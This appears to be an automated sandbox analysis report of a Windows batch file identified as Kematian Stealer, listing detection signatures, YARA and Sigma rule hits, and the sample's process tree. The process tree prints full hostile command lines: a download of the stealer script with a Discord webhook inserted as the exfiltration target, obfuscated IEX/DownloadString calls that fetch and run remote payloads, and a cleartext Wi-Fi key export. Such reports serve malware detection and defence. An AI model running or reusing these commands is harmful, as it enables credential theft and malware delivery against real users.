Windows
Analysis Report
pirates.bat
Overview
General Information
Detection
Kematian Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Kematian Stealer
Yara detected PowerShell ScreenShot
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Wscript called in batch mode (suppress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Steals Internet Explorer cookies
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cscript.exe (PID: 6712 cmdline: cscript //nologo temp.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
- cmd.exe (PID: 3120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- findstr.exe (PID: 2840 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 7188 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- findstr.exe (PID: 7212 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- findstr.exe (PID: 7232 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 7256 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 7288 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- findstr.exe (PID: 7324 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- chcp.com (PID: 7340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
- powershell.exe (PID: 7364 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
- findstr.exe (PID: 7488 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- net.exe (PID: 7504 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7520 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- powershell.exe (PID: 7536 cmdline: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" MD5: 04029E121A0CFA5991749937DD22A1D9)
- doskey.exe (PID: 7684 cmdline: doskey CALL=SHIFT MD5: F6D134052BCB12103B729E4D2EA15B91)
- attrib.exe (PID: 7700 cmdline: attrib +h +s kematian.ps1 MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cmd.exe (PID: 7720 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 7728 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- findstr.exe (PID: 7752 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- findstr.exe (PID: 7776 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 7800 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- findstr.exe (PID: 7820 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- powershell.exe (PID: 7840 cmdline: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- findstr.exe (PID: 8068 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- find.exe (PID: 8108 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
- powershell.exe (PID: 8132 cmdline: powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 7248 cmdline: wscript /b MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7296 cmdline: powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- netsh.exe (PID: 7584 cmdline: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
- csc.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 3052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| | JoeSecurity_PowerShellScreenShot | Yara detected PowerShell ScreenShot | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| | JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security | |
| | JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security | |
| | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | MALWARE_Win_PWSH_PoshWiFiStealer | Detects PowerShell PoshWiFiStealer | ditekSHen | |

System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||